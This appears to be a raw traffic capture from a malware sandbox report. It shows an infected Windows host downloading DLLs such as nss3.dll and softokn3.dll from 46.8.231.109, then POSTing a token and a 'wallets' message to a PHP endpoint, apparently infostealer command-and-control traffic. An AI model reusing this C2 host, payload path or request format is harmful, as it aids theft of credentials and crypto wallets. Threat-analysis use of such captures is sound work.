                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          X-Served-By: cowod.hopto.org


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          13192.168.2.65858846.8.231.10980
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:14.635706902 CEST92OUTGET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317070007 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:15 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "6dde8-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 450024
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317138910 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a2 00 10 a0 a2 00 10 80 a2 00 10 e0 a2 00 10 90 a3 00 10 30 a3 00 10 10 a3 00 10 70 a3 00 10 30 a4 00 10 d0 a3
                                                                                                                                                                                                                                          Data Ascii: 0p0pP0`P` @
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317223072 CEST1236INData Raw: 20 ac 00 10 e0 ab 00 10 10 ad 00 10 50 ad 00 10 30 ad 00 10 00 ad 00 10 10 ae 00 10 10 a5 00 10 20 a5 00 10 00 00 00 00 00 00 00 00 00 00 03 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 a2 00 00 00 a0 a2 00 00 00 e0 a2 00 00
                                                                                                                                                                                                                                          Data Ascii: P0 0p0Pp 0P``
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317303896 CEST1236INData Raw: 00 02 50 3b 01 00 02 60 3b 01 00 02 70 3b 01 00 02 80 3b 01 00 02 90 3b 01 00 02 a0 3b 01 00 02 b0 3b 01 00 02 c0 3b 01 00 02 d0 3b 01 00 02 e0 3b 01 00 00 10 3c 01 00 00 30 3c 01 00 00 60 3c 01 00 02 a0 3c 01 00 02 e0 3c 01 00 02 20 3d 01 00 02
                                                                                                                                                                                                                                          Data Ascii: P;`;p;;;;;;;;<0<`<<< ===0>p>0??@@AAA`BB@CPCpCCCCPD`DpDDDDDEE EEE0F@
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317398071 CEST1236INData Raw: 02 90 84 01 00 02 b0 84 01 00 00 d0 84 01 00 00 f0 84 01 00 00 10 85 01 00 02 60 85 01 00 02 10 86 01 00 02 70 87 01 00 02 80 87 01 00 02 a0 87 01 00 02 e0 87 01 00 02 40 88 01 00 02 b0 88 01 00 02 d0 88 01 00 02 e0 88 01 00 02 70 8e 01 00 02 90
                                                                                                                                                                                                                                          Data Ascii: `p@pP 000p0P @
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317444086 CEST1236INData Raw: f0 6b 02 00 02 10 72 02 00 02 40 7d 02 00 02 a0 7d 02 00 02 50 7e 02 00 00 90 7e 02 00 00 d0 7e 02 00 00 f0 7e 02 00 00 10 7f 02 00 00 20 7f 02 00 00 30 7f 02 00 00 50 7f 02 00 00 00 80 02 00 00 e0 80 02 00 00 90 81 02 00 00 70 82 02 00 00 60 83
                                                                                                                                                                                                                                          Data Ascii: kr@}}P~~~~ 0Pp`PPPp@ `0P 00p
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317508936 CEST896INData Raw: 46 03 00 02 f0 46 03 00 02 00 47 03 00 02 20 47 03 00 02 50 47 03 00 02 70 48 03 00 02 c0 49 03 00 02 d0 49 03 00 02 00 4a 03 00 02 10 4a 03 00 02 20 4a 03 00 02 30 4a 03 00 02 40 4a 03 00 02 50 4a 03 00 02 60 4a 03 00 02 70 4a 03 00 02 80 4a 03
                                                                                                                                                                                                                                          Data Ascii: FFG GPGpHIIJJ J0J@JPJ`JpJJJJK M0M`MpMMMMMMMMMN0OPPPQPRPSPTPUPVPWXYZ[\]^
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317555904 CEST1236INData Raw: 03 00 02 d0 ad 03 00 02 10 ae 03 00 02 50 ae 03 00 02 90 ae 03 00 02 d0 ae 03 00 02 40 b0 03 00 02 a0 b1 03 00 02 00 b3 03 00 02 f0 b3 03 00 02 f0 b4 03 00 02 f0 b5 03 00 02 20 b6 03 00 02 10 b7 03 00 02 00 b8 03 00 02 f0 b8 03 00 02 c0 b9 03 00
                                                                                                                                                                                                                                          Data Ascii: P@ `0P@PP@p0 P
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317617893 CEST1236INData Raw: 52 e7 6a 3d 32 4b e7 b6 46 12 e6 3d 7b c0 34 67 45 e6 5a 3e 8a 4c 57 a5 e3 1d c7 3e b2 9f 01 1a a0 01 2a 3f 11 11 11 11 11 11 81 3f 55 55 55 55 55 55 c5 3f 00 00 00 00 00 00 f0 3f f1 6e df 73 30 71 e6 3d aa ef de b2 3f e5 5a 3e 27 8c af 0a e5 1d
                                                                                                                                                                                                                                          Data Ascii: Rj=2KF={4gEZ>LW>*??UUUUUU??ns0q=?Z>'>H*?^?TUUUU??AeAM(knN0123456789abcdefghijklmnopqrstuvwxyz!0123456789abcdefghijklm
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.317682981 CEST448INData Raw: 15 04 00 00 c0 3f 00 10 16 04 00 00 cc 3f 00 10 18 04 00 00 d8 3f 00 10 19 04 00 00 e4 3f 00 10 1a 04 00 00 f0 3f 00 10 1b 04 00 00 fc 3f 00 10 1c 04 00 00 08 40 00 10 1d 04 00 00 14 40 00 10 1e 04 00 00 20 40 00 10 1f 04 00 00 2c 40 00 10 20 04
                                                                                                                                                                                                                                          Data Ascii: ??????@@ @,@ 8@!D@"P@#\@$h@%t@&@'@)@*@+@,@-@/@2@4@5A6A7A8(A9
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.322758913 CEST1236INData Raw: 81 04 00 00 88 42 00 10 01 08 00 00 94 42 00 10 04 08 00 00 a0 42 00 10 07 08 00 00 ac 42 00 10 09 08 00 00 b8 42 00 10 0a 08 00 00 c4 42 00 10 0c 08 00 00 d0 42 00 10 10 08 00 00 dc 42 00 10 13 08 00 00 e8 42 00 10 14 08 00 00 f4 42 00 10 16 08
                                                                                                                                                                                                                                          Data Ascii: BBBBBBBBBBCC$C,0C;HC>TCC`CkxCCCCCCCC;CkCDDD
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.765445948 CEST88OUTGET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.965421915 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:15 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "1f3950-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 2046288
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          14192.168.2.65859046.8.231.10980
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:15.978240013 CEST92OUTGET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610135078 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:16 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "3ef50-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 257872
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610152960 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 8c 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03
                                                                                                                                                                                                                                          Data Ascii: Ut]h6h{t]UtH]h6h{t1]Ut$]h6h{t]Ut
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610173941 CEST448INData Raw: c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cf cc cc cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0c 8b 48 68 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 04 31 c0 5d c3 a1 0c 9a 03 10 eb d2 cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: t]UtHh]h6h{t1]UtHl]h6h{t]UtHp]h6h{t]UtHt]h6h
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610194921 CEST1236INData Raw: c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 88 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10
                                                                                                                                                                                                                                          Data Ascii: t]Ut]h6h{t]UtHx]h6h{t1]UtH|]h6h{t]Ut]h6
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610208988 CEST1236INData Raw: 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 dc 00 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 e0 00 00 00
                                                                                                                                                                                                                                          Data Ascii: Ut]h6h{t]Ut]h6h{t1]Ut]h6h{t]Ut]h6h{t]
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610227108 CEST448INData Raw: ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 2c 01 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 04 31 c0 5d c3 a1 0c 9a 03 10 eb cf cc cc cc 55 89 e5 a1 0c 9a
                                                                                                                                                                                                                                          Data Ascii: ]Ut,]h6h{t1]Ut0]h6h{t]Ut4]h6h{t]Ut8]h6h
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610300064 CEST1236INData Raw: ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 58 01 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 04 31 c0 5d c3 a1 0c 9a 03 10 eb cf cc cc cc 55 89 e5 a1 0c 9a
                                                                                                                                                                                                                                          Data Ascii: ]UtX]h6h{t1]Ut\]h6h{t]Ut`]h6h{t]Utd]h6h
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610346079 CEST224INData Raw: 85 c0 74 0f 8b 88 c8 01 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 d0 01 00 00 ff 15 00 a0 03 10 5d ff
                                                                                                                                                                                                                                          Data Ascii: t]h6h{t]Ut]h6h{t]Ut]h6h{t]Ut]h6h
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610356092 CEST1236INData Raw: 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 dc 01 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1
                                                                                                                                                                                                                                          Data Ascii: {t]Ut]h6h{t]Ut$]h6h{t]Ut(]h6h{t1]UtD]
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.610372066 CEST224INData Raw: 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 d4 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 07 b8 ff ff ff ff 5d c3 a1 0c 9a 03 10 eb cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88
                                                                                                                                                                                                                                          Data Ascii: Ut]h6h{t]Ut]h6h{t1]Ut]h6h{t]Ut]h
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:16.615019083 CEST1236INData Raw: a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08 85 c0 74 02 5d c3 a1 0c 9a 03 10 eb d1 cc cc cc cc cc 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 cc 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 b8 7b 03 10 83 c4 08
                                                                                                                                                                                                                                          Data Ascii: 6h{t]Ut]h6h{t]Ut]h6h{t]Ut]h6h{t1]Ut
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:17.393707037 CEST96OUTGET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:17.809143066 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:17 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 80880
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:17.810902119 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:17 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "13bf0-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 80880
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.055414915 CEST199OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 947
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.264239073 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:18 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.273973942 CEST466OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECF
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 267
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="message"wallets------DBGHDGHCGHCAAKFIIECF--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:18.458184958 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:18 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 2408
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
